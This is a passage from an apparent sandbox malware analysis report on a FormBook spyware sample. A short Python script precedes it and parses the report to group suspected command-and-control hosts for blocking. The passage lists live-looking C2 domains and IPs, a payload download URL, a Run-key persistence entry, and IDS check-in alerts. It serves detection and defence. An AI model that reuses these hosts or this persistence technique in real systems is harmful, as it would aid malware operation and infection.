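    "http://www.findmyoriginstory.com/t4np/explorer.exe, 00000004.00000002.584837486.00000000065D0000.00000004.00000001.00020000.00000000.sdmpfalse",
    "http://www.madisoncountylincoln.com/explorer.exe, 00000004.00000002.594853816.00000000160EE000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000008.00000002.579809865.0000000005E0E000.00000004.10000000.00040000.00000000.sdmpfalse",
    "https://a.uguu.se/fwvfviJb.dat=SC_0017384.exe, Lvdnyvcvr.exe.0.drfalse",
    "https://www.newtonsoft.com/jsonLvdnyvcvr.exe, 00000005.00000002.549345681.00000000026F2000.00000004.00000800.00020000.00000000.sdmpfalse",
]

# Constructed from the report's IP table: domain -> (resolved IP, Malicious flag).
RESOLVED = {
    "brunaeleandro.com": ("54.85.86.211", True),
    "www.madisoncountylincoln.com": ("172.67.152.24", True),
    "www.findmyoriginstory.com": ("74.208.236.131", True),
    "www.emprendizajesocial.com": ("217.160.0.229", True),
    "www.metatv.app": ("172.67.194.225", True),
    "a.uguu.se": ("188.40.83.211", False),
}

# Every Source cell in this report starts with one of these names. Assumption:
# the list is specific to this analysis (sample, dropped file, injected hosts).
SOURCE_NAMES = ("explorer.exe", "systray.exe", "SC_0017384.exe", "Lvdnyvcvr.exe", "M61Ae5o9b.8.dr")
SOURCE_RE = re.compile("|".join(re.escape(name) for name in SOURCE_NAMES))

# FormBook appends one short alphanumeric campaign path to every host in its
# C2 list; in this report that path is /t4np/. Assumption: four characters.
CAMPAIGN_PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")


def split_row(row):
    """Split one flattened row into (url, source, malicious); None if no source name is found."""
    match = SOURCE_RE.search(row)
    if match is None:
        return None
    url, rest = row[: match.start()], row[match.start():]
    malicious = None
    for flag in ("true", "false"):  # the Malicious cell is the row's trailing token
        if rest.endswith(flag):
            malicious, rest = flag == "true", rest[: -len(flag)]
            break
    return url, rest, malicious


def c2_candidates(rows):
    """Group hostnames by campaign path; hosts sharing one path form the C2/decoy set."""
    by_path = defaultdict(set)
    for row in rows:
        parsed = split_row(row)
        if parsed is None:
            continue
        parts = urlsplit(parsed[0])
        # Doubled strings such as "www.host.comwww.host.com" have no path and are skipped.
        if parts.hostname and CAMPAIGN_PATH_RE.match(parts.path):
            by_path[parts.path].add(parts.hostname)
    return {path: sorted(hosts) for path, hosts in by_path.items()}


def resolved_c2(candidates, resolved):
    """Return (host, ip) pairs for candidate hosts the sandbox actually resolved."""
    hits = []
    for hosts in candidates.values():
        for host in hosts:
            if host in resolved:
                hits.append((host, resolved[host][0]))
    return sorted(hits)


if __name__ == "__main__":
    cands = c2_candidates(SAMPLE_ROWS)
    for path, hosts in cands.items():
        print(path, hosts)
    print(resolved_c2(cands, RESOLVED))
```

Hosts that appear only in the "host" + "www.host" doubled form (brunaeleandro.com, madisoncountylincoln.com, metatv.app, emprendizajesocial.com) are not picked up by the path rule even though the IP table marks them malicious; when blocking, take the union of both tables rather than the path match alone.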
                                                                            Joe Sandbox Version:37.0.0 Beryl
                                                                            Analysis ID:831200
                                                                            Start date and time:2023-03-21 09:09:12 +01:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 12m 17s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:16
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample file name:SC_0017384.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@26/13@11/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 50%
                                                                            HDC Information:
                                                                            • Successful, ratio: 72.3% (good quality ratio 66.2%)
                                                                            • Quality average: 73%
                                                                            • Quality standard deviation: 31.5%
                                                                            HCA Information:
                                                                            • Successful, ratio: 98%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                                                            • TCP Packets have been reduced to 100
                                                                            • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                            • Execution Graph export aborted for target SC_0017384.exe, PID 5876 because it is empty
                                                                            • Not all processes were analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            TimeTypeDescription
                                                                            09:10:09API Interceptor10x Sleep call for process: SC_0017384.exe modified
                                                                            09:10:21API Interceptor98x Sleep call for process: powershell.exe modified
                                                                            09:10:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            09:10:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Lvdnyvcvr "C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe"
                                                                            09:11:00API Interceptor606x Sleep call for process: explorer.exe modified
                                                                            09:11:05API Interceptor20x Sleep call for process: Lvdnyvcvr.exe modified
                                                                            No context
                                                                            Process:C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1570
                                                                            Entropy (8bit):5.357969604744043
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXwYHKhQnowHBtHoxHhAHKzvAHKgmHKKHKdHKBo:iqXwYqhQnowhtIxHeqzIqTqKqdqy
                                                                            MD5:01403378423BC80FF1C71B821B33B07C
                                                                            SHA1:B86FAFEDD98B3237252375E7DAA5215A20C4E0D1
                                                                            SHA-256:D29D2FC27260201D6E5B6AFDC218CD254AE25E692C2935A1E07B50922114FDDE
                                                                            SHA-512:FA447D7B7146B128265A12610F56CB8E3FE5A191A1AC7EEFED644D6C2FB0D8DB2FDF0075058BD2DF939725640DE5432B3F8C3A6E75CE3292CF9952C8C127C0D9
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):1570
                                                                            Entropy (8bit):5.357969604744043
                                                                            Encrypted:false
                                                                            SSDEEP:48:MxHKXwYHKhQnowHBtHoxHhAHKzvAHKgmHKKHKdHKBo:iqXwYqhQnowhtIxHeqzIqTqKqdqy
                                                                            MD5:01403378423BC80FF1C71B821B33B07C
                                                                            SHA1:B86FAFEDD98B3237252375E7DAA5215A20C4E0D1
                                                                            SHA-256:D29D2FC27260201D6E5B6AFDC218CD254AE25E692C2935A1E07B50922114FDDE
                                                                            SHA-512:FA447D7B7146B128265A12610F56CB8E3FE5A191A1AC7EEFED644D6C2FB0D8DB2FDF0075058BD2DF939725640DE5432B3F8C3A6E75CE3292CF9952C8C127C0D9
                                                                            Malicious:true
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):5829
                                                                            Entropy (8bit):4.8968676994158
                                                                            Encrypted:false
                                                                            SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                            MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                            SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                            SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                            SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):15564
                                                                            Entropy (8bit):5.551291320499996
                                                                            Encrypted:false
                                                                            SSDEEP:384:Hte/RG0cEBW971II99bCfyMSjnOilrIR9FvImP4oX+mE:P9719KoOilr09CSlE
                                                                            MD5:E7F1796E8DF5FC62B672DA2F4429B4E4
                                                                            SHA1:D95E6A1652A1D6C86DAE3B9B7F8BF260666442B2
                                                                            SHA-256:05D85276F0B5FD0CCFAD9093B5A7D1E50773B063FD54FBDD7BA4E76893DB79B9
                                                                            SHA-512:D398997AE48EDDDE315F82942F3021904BAFE441516F3A580A059B557FB09D5A38A4D8A179C578132B107110F38E6951EAEABC07A885631670AD55D5312E6419
                                                                            Malicious:false
                                                                            Preview:@...e.......................e.W.h.....1.........................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                            Process:C:\Windows\SysWOW64\systray.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                            Category:dropped
                                                                            Size (bytes):94208
                                                                            Entropy (8bit):1.287139506398081
                                                                            Encrypted:false
                                                                            SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                            MD5:292F98D765C8712910776C89ADDE2311
                                                                            SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                            SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                            SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):692224
                                                                            Entropy (8bit):5.868183818609632
                                                                            Encrypted:false
                                                                            SSDEEP:12288:xTyShIKgMyx0SA4sZm4hGFJ4eCPBh+C3:xxhI+zSAdI2GFJ4Xz
                                                                            MD5:F296A60E1568722B060DE70B46357FE6
                                                                            SHA1:E24C65BD02D435C6B5705E9A01442E0447B77E22
                                                                            SHA-256:661F40C3448FA2ACBDDFD8297C54733B9F2D9C71E15506A4FBA876A25D279E76
                                                                            SHA-512:D3B3A695845EF355BCBA27DD6E55DA85EA345F661AD0D10BFF776E0192E21186B780C764D12E293CDEAA819854FA8D1681D585591F34627436B8CCFF97AB6D64
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................J...D......zh... ........@.. ....................................`.................................,h..L.......FA...........................................................................h............... ..H............text....H... ...J.................. ..`.rsrc...FA.......B...L..............@..@.reloc..............................@..B................H.......4m...............................................................0'.........s......(....jo.....(....o.....(....o...........%.....(....o.....(....o.......o....r...po.....o....r...po....s.....(...+%..o......jo.....o.........(.....o.....o......(.....o.....o....(....(.....o.........(.....o....o....(....*.........(....*..{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*J.s....}.....(....*..0..)...........i.Y.8...............
                                                                            Process:C:\Users\user\Desktop\SC_0017384.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.868183818609632
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: SC_0017384.exe
File size: 692224 bytes
MD5: f296a60e1568722b060de70b46357fe6
SHA1: e24c65bd02d435c6b5705e9a01442e0447b77e22
SHA256: 661f40c3448fa2acbddfd8297c54733b9f2d9c71e15506a4fba876a25d279e76
SHA512: d3b3a695845ef355bcba27dd6e55da85ea345f661ad0d10bff776e0192e21186b780c764d12e293cdeaa819854fa8d1681d585591f34627436b8ccff97ab6d64
SSDEEP: 12288:xTyShIKgMyx0SA4sZm4hGFJ4eCPBh+C3:xxhI+zSAdI2GFJ4Xz
TLSH: BFE429707BF89717C5BF6B72E0B9B25847B4D466A216E78B844D52F10CD2340AC1A3AF
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.................J...D......zh... ........@.. ....................................`................................
Icon Hash: 185ada32e9cc368b
Entrypoint: 0x4a687a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x6418E0D7 [Mon Mar 20 22:40:23 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [004A6888h]

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa682c          0x4c          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa8000          0x4146        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xae000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xa6888          0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2000           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type  Entropy              Characteristics
.text   0x2000           0xa4890       0xa4a00   False     0.34067126993166286  data       5.83594677699421     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xa8000          0x4146        0x4200    False     0.20815577651515152  data       4.044367816999576    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xae000          0xc           0x200     False     0.044921875          data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name           RVA      Size    Type                                                                                           Language  Country
RT_ICON        0xa8140  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m
RT_ICON        0xa85b8  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m
RT_ICON        0xa9670  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m
RT_GROUP_ICON  0xabc28  0x30    data
RT_VERSION     0xabc68  0x2e4   data
RT_MANIFEST    0xabf5c  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

DLL          Import
mscoree.dll  _CorExeMain

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
03/21/23-09:12:13.411086  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49710        80         192.168.2.5  172.67.194.225
03/21/23-09:11:27.575244  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49702        80         192.168.2.5  74.208.236.131
03/21/23-09:11:27.575244  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49702        80         192.168.2.5  74.208.236.131
03/21/23-09:11:27.575244  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49702        80         192.168.2.5  74.208.236.131
03/21/23-09:12:13.411086  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49710        80         192.168.2.5  172.67.194.225
03/21/23-09:12:13.411086  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49710        80         192.168.2.5  172.67.194.225
                                                                            Mar 21, 2023 09:11:33.796116114 CET53497248.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:38.816267967 CET6145253192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:38.865930080 CET53614528.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:11:52.604053974 CET6532353192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:11:52.655042887 CET53653238.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:02.826678038 CET5148453192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:02.859888077 CET53514848.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:10.767373085 CET6344653192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:10.800434113 CET53634468.8.8.8192.168.2.5
                                                                            Mar 21, 2023 09:12:30.799199104 CET5675153192.168.2.58.8.8.8
                                                                            Mar 21, 2023 09:12:30.833955050 CET53567518.8.8.8192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 21, 2023 09:10:10.167546034 CET | 192.168.2.5 | 8.8.8.8 | 0x51ae | Standard query (0) | a.uguu.se | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:06.057960033 CET | 192.168.2.5 | 8.8.8.8 | 0x4cc7 | Standard query (0) | a.uguu.se | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:12.532519102 CET | 192.168.2.5 | 8.8.8.8 | 0x4c7c | Standard query (0) | a.uguu.se | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:27.414058924 CET | 192.168.2.5 | 8.8.8.8 | 0x796e | Standard query (0) | www.findmyoriginstory.com | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:32.721693039 CET | 192.168.2.5 | 8.8.8.8 | 0xd6de | Standard query (0) | www.myprojoints.com | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:33.768779039 CET | 192.168.2.5 | 8.8.8.8 | 0x8005 | Standard query (0) | www.myprojoints.com | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:38.816267967 CET | 192.168.2.5 | 8.8.8.8 | 0x9a6f | Standard query (0) | www.emprendizajesocial.com | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:11:52.604053974 CET | 192.168.2.5 | 8.8.8.8 | 0xae8b | Standard query (0) | www.brunaeleandro.com | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:02.826678038 CET | 192.168.2.5 | 8.8.8.8 | 0x2e15 | Standard query (0) | www.madisoncountylincoln.com | A (IP address) | IN (0x0001) | false
Mar 21, 2023 09:12:10.767373085 CET | 192.168.2.5 | 8.8.8.8 | 0xf69 | Standard query (0) | www.metatv.app | A (IP address) | IN (0x0001) | false
